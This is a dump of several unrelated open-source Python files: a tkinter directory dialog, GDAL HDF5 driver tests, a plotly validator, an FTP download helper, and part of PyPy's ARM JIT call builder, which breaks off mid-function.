tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | 1
|
2021-04-23T00:03:46.000Z
|
2021-04-23T00:03:46.000Z
|
from tkinter import Entry
from tanager_feeder.dialogs.dialog import Dialog
class NewDirDialog(Dialog):
    def __init__(self, controller, fexplorer, label="New directory name: ", title="New Directory"):
super().__init__(
controller, label=label, title=title, buttons={"ok": {self.get: []}, "cancel": {}}, button_width=15
)
self.dir_entry = Entry(
self.top,
width=40,
bg=self.tk_format.entry_background,
selectbackground=self.tk_format.selectbackground,
selectforeground=self.tk_format.selectforeground,
)
self.dir_entry.pack(padx=(10, 10))
self.listener = self.controller.spec_listener
self.fexplorer = fexplorer
def get(self):
subdir = self.dir_entry.get()
if subdir[0:3] != "C:\\":
self.fexplorer.mkdir(self.fexplorer.current_parent + "\\" + subdir)
else:
self.fexplorer.mkdir(subdir)
| 35.888889
| 111
| 0.618163
|
a2aea9bde1b97b40d6b686cf8b8ff209ffe48660
| 15,224
|
py
|
Python
|
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test read functionality for HDF5 driver.
# Author: Even Rouault <even dot rouault at mines dash paris dot org>
#
###############################################################################
# Copyright (c) 2008-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import shutil
import pytest
from osgeo import gdal
import gdaltest
from uffd import uffd_compare
###############################################################################
# Test if HDF5 driver is present
pytestmark = pytest.mark.require_driver('HDF5')
@pytest.fixture(autouse=True)
def check_no_file_leaks():
num_files = len(gdaltest.get_opened_files())
yield
diff = len(gdaltest.get_opened_files()) - num_files
assert diff == 0, 'Leak of file handles: %d leaked' % diff
###############################################################################
# Confirm expected subdataset information.
def test_hdf5_2():
ds = gdal.Open('data/groups.h5')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 4, 'Did not get expected subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'HDF5:"data/groups.h5"://MyGroup/Group_A/dset2' and sds_list['SUBDATASET_2_NAME'] == 'HDF5:"data/groups.h5"://MyGroup/dset1', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/groups.h5'), 'file still opened.'
###############################################################################
# Confirm that single variable files can be accessed directly without
# subdataset stuff.
def test_hdf5_3():
ds = gdal.Open('HDF5:"data/u8be.h5"://TestArray')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 135, 'did not get expected checksum'
ds = None
assert not gdaltest.is_file_open('data/u8be.h5'), 'file still opened.'
###############################################################################
# Confirm subdataset access, and checksum.
def test_hdf5_4():
ds = gdal.Open('HDF5:"data/u8be.h5"://TestArray')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 135, 'did not get expected checksum'
###############################################################################
# Similar check on a 16bit dataset.
def test_hdf5_5():
ds = gdal.Open('HDF5:"data/groups.h5"://MyGroup/dset1')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 18, 'did not get expected checksum'
###############################################################################
# Test generating an overview on a subdataset.
def test_hdf5_6():
shutil.copyfile('data/groups.h5', 'tmp/groups.h5')
ds = gdal.Open('HDF5:"tmp/groups.h5"://MyGroup/dset1')
ds.BuildOverviews(overviewlist=[2])
ds = None
assert not gdaltest.is_file_open('tmp/groups.h5'), 'file still opened.'
ds = gdal.Open('HDF5:"tmp/groups.h5"://MyGroup/dset1')
assert ds.GetRasterBand(1).GetOverviewCount() == 1, 'failed to find overview'
ds = None
# confirm that it works with a different path. (#3290)
ds = gdal.Open('HDF5:"data/../tmp/groups.h5"://MyGroup/dset1')
assert ds.GetRasterBand(1).GetOverviewCount() == 1, \
'failed to find overview with alternate path'
ovfile = ds.GetMetadataItem('OVERVIEW_FILE', 'OVERVIEWS')
assert ovfile[:11] == 'data/../tmp', 'did not get expected OVERVIEW_FILE.'
ds = None
gdaltest.clean_tmp()
###############################################################################
# Coarse metadata check (regression test for #2412).
def test_hdf5_7():
ds = gdal.Open('data/metadata.h5')
metadata = ds.GetMetadata()
metadataList = ds.GetMetadata_List()
ds = None
assert not gdaltest.is_file_open('data/metadata.h5'), 'file still opened.'
assert len(metadata) == len(metadataList), 'error in metadata dictionary setup'
metadataList = [item.split('=', 1)[0] for item in metadataList]
for key in metadataList:
try:
metadata.pop(key)
except KeyError:
pytest.fail('unable to find "%s" key' % key)
###############################################################################
# Test metadata names.
def test_hdf5_8():
ds = gdal.Open('data/metadata.h5')
metadata = ds.GetMetadata()
ds = None
assert metadata, 'no metadata found'
h5groups = ['G1', 'Group with spaces', 'Group_with_underscores',
'Group with spaces_and_underscores']
h5datasets = ['D1', 'Dataset with spaces', 'Dataset_with_underscores',
'Dataset with spaces_and_underscores']
attributes = {
'attribute': 'value',
'attribute with spaces': 0,
'attribute_with underscores': 0,
'attribute with spaces_and_underscores': .1,
}
def scanMetadata(parts):
for attr in attributes:
name = '_'.join(parts + [attr])
name = name.replace(' ', '_')
assert name in metadata, ('unable to find metadata: "%s"' % name)
value = metadata.pop(name)
value = value.strip(' d')
value = type(attributes[attr])(value)
assert value == attributes[attr], ('incorrect metadata value for "%s": '
'"%s" != "%s"' % (name, value,
attributes[attr]))
# level0
assert scanMetadata([]) is None
# level1 datasets
for h5dataset in h5datasets:
assert scanMetadata([h5dataset]) is None
# level1 groups
for h5group in h5groups:
assert scanMetadata([h5group]) is None
# level2 datasets
for h5dataset in h5datasets:
assert scanMetadata([h5group, h5dataset]) is None
###############################################################################
# Variable length string metadata check (regression test for #4228).
def test_hdf5_9():
if int(gdal.VersionInfo('VERSION_NUM')) < 1900:
pytest.skip('would crash')
ds = gdal.Open('data/vlstr_metadata.h5')
metadata = ds.GetRasterBand(1).GetMetadata()
ds = None
assert not gdaltest.is_file_open('data/vlstr_metadata.h5'), 'file still opened.'
ref_metadata = {
'TEST_BANDNAMES': 'SAA',
'TEST_CODING': '0.6666666667 0.0000000000 TRUE',
'TEST_FLAGS': '255=noValue',
'TEST_MAPPING': 'Geographic Lat/Lon 0.5000000000 0.5000000000 27.3154761905 -5.0833333333 0.0029761905 0.0029761905 WGS84 Degrees',
'TEST_NOVALUE': '255',
'TEST_RANGE': '0 255 0 255',
}
assert len(metadata) == len(ref_metadata), ('incorrect number of metadata: '
'expected %d, got %d' % (len(ref_metadata),
len(metadata)))
for key in metadata:
assert key in ref_metadata, ('unexpected metadata key "%s"' % key)
assert metadata[key] == ref_metadata[key], \
('incorrect metadata value for key "%s": '
'expected "%s", got "%s" ' %
(key, ref_metadata[key], metadata[key]))
###############################################################################
# Test CSK_DGM.h5 (#4160)
def test_hdf5_10():
# Try opening the QLK subdataset to check that no error is generated
gdal.ErrorReset()
ds = gdal.Open('HDF5:"data/CSK_DGM.h5"://S01/QLK')
assert ds is not None and gdal.GetLastErrorMsg() == ''
ds = None
ds = gdal.Open('HDF5:"data/CSK_DGM.h5"://S01/SBI')
got_gcpprojection = ds.GetGCPProjection()
assert got_gcpprojection.startswith('GEOGCS["WGS 84",DATUM["WGS_1984"')
got_gcps = ds.GetGCPs()
assert len(got_gcps) == 4
assert (abs(got_gcps[0].GCPPixel - 0) <= 1e-5 and abs(got_gcps[0].GCPLine - 0) <= 1e-5 and \
abs(got_gcps[0].GCPX - 12.2395902509238) <= 1e-5 and abs(got_gcps[0].GCPY - 44.7280047434954) <= 1e-5)
ds = None
assert not gdaltest.is_file_open('data/CSK_DGM.h5'), 'file still opened.'
###############################################################################
# Test CSK_GEC.h5 (#4160)
def test_hdf5_11():
# Try opening the QLK subdataset to check that no error is generated
gdal.ErrorReset()
ds = gdal.Open('HDF5:"data/CSK_GEC.h5"://S01/QLK')
assert ds is not None and gdal.GetLastErrorMsg() == ''
ds = None
ds = gdal.Open('HDF5:"data/CSK_GEC.h5"://S01/SBI')
got_projection = ds.GetProjection()
assert got_projection.startswith('PROJCS["Transverse_Mercator",GEOGCS["WGS 84",DATUM["WGS_1984"')
got_gt = ds.GetGeoTransform()
expected_gt = (275592.5, 2.5, 0.0, 4998152.5, 0.0, -2.5)
for i in range(6):
assert abs(got_gt[i] - expected_gt[i]) <= 1e-5
ds = None
assert not gdaltest.is_file_open('data/CSK_GEC.h5'), 'file still opened.'
###############################################################################
# Test ODIM_H5 (#5032)
def test_hdf5_12():
if not gdaltest.download_file('http://trac.osgeo.org/gdal/raw-attachment/ticket/5032/norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf', 'norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf'):
pytest.skip()
ds = gdal.Open('tmp/cache/norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf')
got_projection = ds.GetProjection()
assert 'Azimuthal_Equidistant' in got_projection
got_gt = ds.GetGeoTransform()
expected_gt = (-239999.9823595533, 997.9165855496311, 0.0, 239000.03320328312, 0.0, -997.9167782264051)
assert max([abs(got_gt[i] - expected_gt[i]) for i in range(6)]) <= 1e-5, got_gt
###############################################################################
# Test MODIS L2 HDF5 GCPs (#6666)
def test_hdf5_13():
if not gdaltest.download_file('http://oceandata.sci.gsfc.nasa.gov/cgi/getfile/A2016273115000.L2_LAC_OC.nc', 'A2016273115000.L2_LAC_OC.nc'):
pytest.skip()
ds = gdal.Open('HDF5:"tmp/cache/A2016273115000.L2_LAC_OC.nc"://geophysical_data/Kd_490')
got_gcps = ds.GetGCPs()
assert len(got_gcps) == 3030
assert (abs(got_gcps[0].GCPPixel - 0.5) <= 1e-5 and abs(got_gcps[0].GCPLine - 0.5) <= 1e-5 and \
abs(got_gcps[0].GCPX - 33.1655693) <= 1e-5 and abs(got_gcps[0].GCPY - 39.3207207) <= 1e-5)
###############################################################################
# Test complex data subsets
def test_hdf5_14():
ds = gdal.Open('data/complex.h5')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 6, 'Did not get expected complex subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'HDF5:"data/complex.h5"://f16' and sds_list['SUBDATASET_2_NAME'] == 'HDF5:"data/complex.h5"://f32' and sds_list['SUBDATASET_3_NAME'] == 'HDF5:"data/complex.h5"://f64', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/complex.h5'), 'file still opened.'
###############################################################################
# Confirm complex subset data access and checksum
# Start with Float32
def test_hdf5_15():
ds = gdal.Open('HDF5:"data/complex.h5"://f32')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 523, 'did not get expected checksum'
# Repeat for Float64
def test_hdf5_16():
ds = gdal.Open('HDF5:"data/complex.h5"://f64')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 511, 'did not get expected checksum'
# Repeat for Float16
def test_hdf5_17():
ds = gdal.Open('HDF5:"data/complex.h5"://f16')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 412, 'did not get expected checksum'
def test_hdf5_single_char_varname():
ds = gdal.Open('HDF5:"data/single_char_varname.h5"://e')
assert ds is not None
def test_hdf5_attr_all_datatypes():
ds = gdal.Open('data/attr_all_datatypes.h5')
assert ds is not None
assert ds.GetMetadata() == {'attr_float16': '125 ',
'attr_float32': '125 ',
'attr_float64': '125 ',
'attr_int16': '125 ',
'attr_int32': '125 ',
'attr_int8': '125 ',
'attr_uint16': '125 ',
'attr_uint32': '125 ',
'attr_uint8': '125 '}
def test_hdf5_virtual_file():
hdf5_files = [
'CSK_GEC.h5',
'vlstr_metadata.h5',
'groups.h5',
'complex.h5',
'single_char_varname.h5',
'CSK_DGM.h5',
'u8be.h5',
'metadata.h5'
]
for hdf5_file in hdf5_files:
assert uffd_compare(hdf5_file) is True
# FIXME: This FTP server seems to have disappeared. Replace with something else?
hdf5_list = [
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/samples/convert', 'C1979091.h5',
'HDF4_PALGROUP/HDF4_PALETTE_2', 7488, -1),
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/samples/convert', 'C1979091.h5',
'Raster_Image_#0', 3661, -1),
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/geospatial/DEM', 'half_moon_bay.grid',
'HDFEOS/GRIDS/DEMGRID/Data_Fields/Elevation', 30863, -1),
]
@pytest.mark.parametrize(
'downloadURL,fileName,subdatasetname,checksum,download_size',
hdf5_list,
ids=['HDF5:"' + item[1] + '"://' + item[2] for item in hdf5_list],
)
def test_hdf5(downloadURL, fileName, subdatasetname, checksum, download_size):
if not gdaltest.download_file(downloadURL + '/' + fileName, fileName, download_size):
pytest.skip('no download')
ds = gdal.Open('HDF5:"tmp/cache/' + fileName + '"://' + subdatasetname)
assert ds.GetRasterBand(1).Checksum() == checksum, 'Bad checksum. Expected %d, got %d' % (checksum, ds.GetRasterBand(1).Checksum())
def test_hdf5_dimension_labels_with_null():
assert gdal.Open('data/dimension_labels_with_null.h5')
| 33.459341
| 213
| 0.583684
|
46dbc192eccdafd16e79757e75b47589e023a62b
| 601
|
py
|
Python
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
gnestor/plotly.py
|
a8ae062795ddbf9867b8578fe6d9e244948c15ff
|
[
"MIT"
] | 12
|
2020-04-18T18:10:22.000Z
|
2021-12-06T10:11:15.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
Vesauza/plotly.py
|
e53e626d59495d440341751f60aeff73ff365c28
|
[
"MIT"
] | 27
|
2020-04-28T21:23:12.000Z
|
2021-06-25T15:36:38.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
Vesauza/plotly.py
|
e53e626d59495d440341751f60aeff73ff365c28
|
[
"MIT"
] | 6
|
2020-04-18T23:07:08.000Z
|
2021-11-18T07:53:06.000Z
|
import _plotly_utils.basevalidators
class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='showexponent',
parent_name='scatterpolar.marker.colorbar',
**kwargs
):
super(ShowexponentValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop('edit_type', 'colorbars'),
role=kwargs.pop('role', 'style'),
values=kwargs.pop('values', ['all', 'first', 'last', 'none']),
**kwargs
)
| 30.05
| 78
| 0.613977
|
6a5f0cfc0d314d4b3cd2e0ecea86581feac805e8
| 1,615
|
py
|
Python
|
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | null | null | null |
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | null | null | null |
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | 1
|
2018-05-19T21:30:01.000Z
|
2018-05-19T21:30:01.000Z
|
"""
Script: ftpConn.py
Author: Sascha Sambale
Date: June 21st, 2016
Purpose: Accesses an FTP Server to download a given file from a given path.
"""
import ftplib
import logging
import tempfile
class FTPConnection(object):
def __init__(self):
self.logger = logging.getLogger('ftpDownloader')
self.ftp_conn = ftplib.FTP()
self.user = "user"
self.password = "password"
self.port = 21
self.path = "/"
self.local_path = tempfile.gettempdir() + "/"
self.host = "myHost"
def config(self, logger, user, password, host, port, path, local_path):
self.logger = logger
self.host = host
self.user = user
self.password = password
self.port = port
self.path = path
self.local_path = local_path
def download(self, filename):
self.ftp_conn = ftplib.FTP(str(self.host))
file_name = filename.split("/")
local_filename = filename
if len(file_name) > 1:
local_filename = file_name[len(file_name) - 1]
self.logger.info(
"Local filename must not contain a full path - will reduce to filename only!")
self.logger.info("Old file name: %s", filename)
self.logger.info("New file name: %s", local_filename)
file = open(self.local_path + local_filename, 'wb')
self.ftp_conn.cwd(self.path)
self.ftp_conn.retrbinary('RETR ' + filename, file.write)
self.logger.info("File downloaded: " + self.local_path + local_filename)
file.close()
self.ftp_conn.quit()
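# Editor's hedged usage sketch (host and credentials are placeholders):
#
#     conn = FTPConnection()
#     conn.config(logging.getLogger('ftpDownloader'), "user", "secret",
#                 "ftp.example.com", 21, "/outgoing", tempfile.gettempdir() + "/")
#     conn.download("reports/latest.csv")   # stored locally as latest.csv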
| 32.959184
| 98
| 0.611765
|
21ec3b67b28fe035bda6d06ef18c104618a96616
| 92
|
py
|
Python
|
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class RamlTestConfig(AppConfig):
name = 'raml_test'
| 15.333333
| 33
| 0.76087
|
5ef6553aee61b81b4686b35be205dc561f3680fd
| 21,393
|
py
|
Python
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 333
|
2015-08-08T18:03:38.000Z
|
2022-03-22T18:13:12.000Z
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 7
|
2020-02-16T16:49:05.000Z
|
2021-11-26T09:00:56.000Z
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
from rpython.rlib.clibffi import FFI_DEFAULT_ABI
from rpython.rlib.objectmodel import we_are_translated
from rpython.jit.metainterp.history import INT, FLOAT, REF
from rpython.jit.backend.arm.arch import WORD
from rpython.jit.backend.arm import registers as r
from rpython.jit.backend.arm import conditions as c
from rpython.jit.backend.arm.locations import RawSPStackLocation
from rpython.jit.backend.arm.jump import remap_frame_layout
from rpython.jit.backend.llsupport.callbuilder import AbstractCallBuilder
from rpython.jit.backend.arm.helper.assembler import count_reg_args
from rpython.jit.backend.arm.helper.assembler import saved_registers
from rpython.jit.backend.arm.helper.regalloc import check_imm_arg
from rpython.jit.backend.arm.codebuilder import OverwritingBuilder
from rpython.jit.backend.llsupport import llerrno
from rpython.rtyper.lltypesystem import rffi
class ARMCallbuilder(AbstractCallBuilder):
def __init__(self, assembler, fnloc, arglocs,
resloc=r.r0, restype=INT, ressize=WORD, ressigned=True):
AbstractCallBuilder.__init__(self, assembler, fnloc, arglocs,
resloc, restype, ressize)
self.current_sp = 0
def push_gcmap(self):
assert not self.is_call_release_gil
# we push *now* the gcmap, describing the status of GC registers
# after the rearrangements done just above, ignoring the return
# value eax, if necessary
noregs = self.asm.cpu.gc_ll_descr.is_shadow_stack()
gcmap = self.asm._regalloc.get_gcmap([r.r0], noregs=noregs)
self.asm.push_gcmap(self.mc, gcmap, store=True)
def pop_gcmap(self):
self.asm._reload_frame_if_necessary(self.mc)
self.asm.pop_gcmap(self.mc)
def emit_raw_call(self):
#the actual call
if self.fnloc.is_imm():
self.mc.BL(self.fnloc.value)
return
# --self.fnloc.is_stack() is always remapped to r4 here
assert self.fnloc.is_core_reg()
self.mc.BLX(self.fnloc.value)
def restore_stack_pointer(self):
# readjust the sp in case we passed some args on the stack
assert self.current_sp % 8 == 0 # sanity check
if self.current_sp != 0:
self._adjust_sp(self.current_sp)
self.current_sp = 0
def _push_stack_args(self, stack_args, on_stack):
assert on_stack % 8 == 0
if on_stack == 0:
return
self._adjust_sp(-on_stack)
self.current_sp = on_stack
ofs = 0
for i, arg in enumerate(stack_args):
if arg is not None:
sp_loc = RawSPStackLocation(ofs, arg.type)
self.asm.regalloc_mov(arg, sp_loc)
ofs += sp_loc.width
else: # alignment word
ofs += WORD
def _adjust_sp(self, n):
# adjust the current stack pointer by n bytes
if n > 0:
if check_imm_arg(n):
self.mc.ADD_ri(r.sp.value, r.sp.value, n)
else:
self.mc.gen_load_int(r.ip.value, n)
self.mc.ADD_rr(r.sp.value, r.sp.value, r.ip.value)
elif n < 0:
n = abs(n)
if check_imm_arg(n):
self.mc.SUB_ri(r.sp.value, r.sp.value, n)
else:
self.mc.gen_load_int(r.ip.value, n)
self.mc.SUB_rr(r.sp.value, r.sp.value, r.ip.value)
def call_releasegil_addr_and_move_real_arguments(self, fastgil):
assert self.is_call_release_gil
assert not self.asm._is_asmgcc()
# Save this thread's shadowstack pointer into r7, for later comparison
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
rst = gcrootmap.get_root_stack_top_addr()
self.mc.gen_load_int(r.r5.value, rst)
self.mc.LDR_ri(r.r7.value, r.r5.value)
# change 'rpy_fastgil' to 0 (it should be non-zero right now)
if self.asm.cpu.cpuinfo.arch_version >= 7:
self.mc.DMB()
self.mc.gen_load_int(r.r6.value, fastgil)
self.mc.LDR_ri(r.r8.value, r.r6.value) # => our thread ident
self.mc.MOV_ri(r.ip.value, 0)
self.mc.STR_ri(r.ip.value, r.r6.value)
if not we_are_translated(): # for testing: we should not access
self.mc.ADD_ri(r.fp.value, r.fp.value, 1) # fp any more
def move_real_result_and_call_reacqgil_addr(self, fastgil):
# try to reacquire the lock. The registers r5 to r7 are still
# valid from before the call:
# r5 == &root_stack_top
# r6 == fastgil
# r7 == previous value of root_stack_top
# r8 == our thread ident
self.mc.LDREX(r.r3.value, r.r6.value) # load the lock value
self.mc.CMP_ri(r.r3.value, 0) # is the lock free?
self.mc.STREX(r.r3.value, r.r8.value, r.r6.value, c=c.EQ)
# try to claim the lock
self.mc.CMP_ri(r.r3.value, 0, cond=c.EQ) # did this succeed?
if self.asm.cpu.cpuinfo.arch_version >= 7:
self.mc.DMB()
# the success of the lock acquisition is defined by
# 'EQ is true', or equivalently by 'r3 == 0'.
#
if self.asm.cpu.gc_ll_descr.gcrootmap:
# When doing a call_release_gil with shadowstack, there
# is the risk that the 'rpy_fastgil' was free but the
# current shadowstack can be the one of a different
# thread. So here we check if the shadowstack pointer
# is still the same as before we released the GIL (saved
# in 'r7'), and if not, we fall back to 'reacqgil_addr'.
self.mc.LDR_ri(r.ip.value, r.r5.value, cond=c.EQ)
self.mc.CMP_rr(r.ip.value, r.r7.value, cond=c.EQ)
b1_location = self.mc.currpos()
self.mc.BKPT() # BEQ below
# there are two cases here: either EQ was false from
# the beginning, or EQ was true at first but the CMP
# made it false. In the second case we need to
# release the fastgil here. We know which case it is
# by checking again r3.
self.mc.CMP_ri(r.r3.value, 0)
self.mc.STR_ri(r.r3.value, r.r6.value, cond=c.EQ)
else:
b1_location = self.mc.currpos()
self.mc.BKPT() # BEQ below
#
# save the result we just got
gpr_to_save, vfp_to_save = self.get_result_locs()
with saved_registers(self.mc, gpr_to_save, vfp_to_save):
self.mc.BL(self.asm.reacqgil_addr)
# replace b1_location with B(here, c.EQ)
pmc = OverwritingBuilder(self.mc, b1_location, WORD)
pmc.B_offs(self.mc.currpos(), c.EQ)
        if not we_are_translated():                # for testing: now we can access
self.mc.SUB_ri(r.fp.value, r.fp.value, 1) # fp again
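    # Illustrative aside (not part of the original backend): the LDREX/STREX
    # pair emitted above performs one compare-and-swap attempt on 'rpy_fastgil'.
    # A hedged pure-Python sketch of the logic the generated code implements
    # (all names below are made up for illustration only):
    #
    #   def try_reacquire_fastgil(fastgil, thread_ident):
    #       old = fastgil.load_exclusive()                  # LDREX
    #       if old != 0:
    #           return False                                # lock not free
    #       return fastgil.store_exclusive(thread_ident)    # STREX succeeded?
    #
    # Only if this fast path fails (or the shadowstack changed) does the slow
    # path call 'reacqgil_addr'.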
def get_result_locs(self):
raise NotImplementedError
def _ensure_result_bit_extension(self, resloc, size, signed):
if size == 4:
return
if size == 1:
if not signed: # unsigned char
self.mc.AND_ri(resloc.value, resloc.value, 0xFF)
else:
self.mc.LSL_ri(resloc.value, resloc.value, 24)
self.mc.ASR_ri(resloc.value, resloc.value, 24)
elif size == 2:
if not signed:
self.mc.LSL_ri(resloc.value, resloc.value, 16)
self.mc.LSR_ri(resloc.value, resloc.value, 16)
else:
self.mc.LSL_ri(resloc.value, resloc.value, 16)
self.mc.ASR_ri(resloc.value, resloc.value, 16)
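    # Illustrative aside (not part of the original backend): the shift pairs in
    # _ensure_result_bit_extension sign-extend a narrow result (LSL then ASR),
    # while AND/LSR zero-extend it.  A hedged pure-Python sketch of the same
    # idea for a signed 8-bit value:
    #
    #   def _sign_extend_8(x):
    #       x &= 0xFF
    #       return x - 0x100 if x & 0x80 else x
    #
    #   # _sign_extend_8(0xFF) == -1, _sign_extend_8(0x7F) == 127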
def write_real_errno(self, save_err):
if save_err & rffi.RFFI_READSAVED_ERRNO:
# Just before a call, read '*_errno' and write it into the
# real 'errno'. The r0-r3 registers contain arguments to the
# future call; the r5-r8 registers contain various stuff.
# We still have r9-r12.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r9.value, r.sp.value,
self.asm.saved_threadlocal_addr + self.current_sp)
self.mc.LDR_ri(r.ip.value, r.r9.value, p_errno)
self.mc.LDR_ri(r.r9.value, r.r9.value, rpy_errno)
self.mc.STR_ri(r.r9.value, r.ip.value)
elif save_err & rffi.RFFI_ZERO_ERRNO_BEFORE:
# Same, but write zero.
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r9.value, r.sp.value,
self.asm.saved_threadlocal_addr + self.current_sp)
self.mc.LDR_ri(r.ip.value, r.r9.value, p_errno)
self.mc.MOV_ri(r.r9.value, 0)
self.mc.STR_ri(r.r9.value, r.ip.value)
def read_real_errno(self, save_err):
if save_err & rffi.RFFI_SAVE_ERRNO:
# Just after a call, read the real 'errno' and save a copy of
# it inside our thread-local '*_errno'. Registers r9-r12
# are unused here, and registers r2-r3 never contain anything
# after the call.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r3.value, r.sp.value,
self.asm.saved_threadlocal_addr)
self.mc.LDR_ri(r.ip.value, r.r3.value, p_errno)
self.mc.LDR_ri(r.ip.value, r.ip.value, 0)
self.mc.STR_ri(r.ip.value, r.r3.value, rpy_errno)
class SoftFloatCallBuilder(ARMCallbuilder):
# XXX Maybe we could kill this class and unify the remaining two
# XXX classes, by carefully checking if all methods here are doing
# XXX the exact same thing as the methods from HardFloatCallBuilder,
# XXX but simply forcing all BoxFloat arguments to be longlongs
# XXX (i.e. ignoring 'f' in favour of 'L'), and the same with
# XXX single-float arguments (ignoring 'S' in favour of 'i');
# XXX and the same for the return value.
def get_result_locs(self):
if self.resloc is None:
return [], []
if self.resloc.is_vfp_reg():
return [r.r0, r.r1], []
assert self.resloc.is_core_reg()
return [r.r0], []
def load_result(self):
        # ensure the result is well-formed and stored in the correct location
resloc = self.resloc
if resloc is None:
return
if resloc.is_vfp_reg():
# move result to the allocated register
self.asm.mov_to_vfp_loc(r.r0, r.r1, resloc)
elif resloc.is_core_reg():
# move result to the allocated register
if resloc is not r.r0:
self.asm.mov_loc_loc(r.r0, resloc)
self._ensure_result_bit_extension(resloc,
self.ressize, self.ressign)
def _collect_and_push_stack_args(self, arglocs):
n_args = len(arglocs)
reg_args = count_reg_args(arglocs)
# all arguments past the 4th go on the stack
# first we need to prepare the list so it stays aligned
stack_args = []
count = 0
on_stack = 0
if n_args > reg_args:
for i in range(reg_args, n_args):
arg = arglocs[i]
if arg.type != FLOAT:
count += 1
on_stack += 1
else:
on_stack += 2
if count % 2 != 0:
stack_args.append(None)
count = 0
on_stack += 1
stack_args.append(arg)
